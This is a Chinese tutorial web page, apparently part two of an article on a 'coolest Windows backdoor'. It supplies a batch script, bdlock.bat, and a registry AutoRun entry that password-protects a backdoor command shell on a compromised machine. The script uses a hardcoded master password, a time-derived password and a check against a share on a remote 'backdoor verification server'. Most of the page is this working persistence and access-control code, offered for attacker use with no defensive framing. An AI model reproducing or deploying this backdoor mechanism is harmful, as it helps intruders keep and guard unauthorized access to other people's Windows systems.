变态入侵:有史以来最酷的Windows后门(2)

http://www.itjxue.com  2015-07-17 00:48  来源:未知  点击次数: 

  后门锁扩展:

 

  allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证

  用下面的后门锁的方法是 把代码保存为bdlock.bat

  然后修改注册表位置即可

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
  "AutoRun"="bdlock.bat"

  @Echo Off
  title 后门登陆验证
  color a
  cls
  set temprandom=%RANDOM%
  echo 请输入验证码:%temprandom%
  set/p check=
  if "%check%"=="%temprandom%%temprandom%" goto passcheck
  if "%check%"=="%temprandom%" (
  rem 后门服务器验证
  rem 如果没有后门验证服务器请rem注释掉下一行代码
  if exist \192.168.8.8\backdoor$\pass goto passcheck
  )
  echo 验证失败
  pause
  exit
  :passcheck
  echo 验证成功
  If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
  Set passcmdlock=http://blog.csdn.net/freexploit/
  :allyesno
  Set Errorlevel=>nul
  Echo 请输入验证密码?
  Set password=allyesno Is a pig>nul
  Set/p password=
  rem 万能密码
  if "%password%"=="allyesno is a sb" goto endx
  If %time:~1,1%==0 Set timechange=a
  If %time:~1,1%==1 Set timechange=b
  If %time:~1,1%==2 Set timechange=c
  If %time:~1,1%==3 Set timechange=d
  If %time:~1,1%==4 Set timechange=e
  If %time:~1,1%==5 Set timechange=f
  If %time:~1,1%==6 Set timechange=g
  If %time:~1,1%==7 Set timechange=h
  If %time:~1,1%==8 Set timechange=i
  If %time:~1,1%==9 Set timechange=j
  set/a sum=%time:~1,1%+%time:~1,1%
  Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
  If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
  Echo 请联系客服咨询正确密码!&Goto allyesno
  :End
  Set password=>nul
  Set Errorlevel=>nul
  Echo

  :endx

(责任编辑:IT教学网)

更多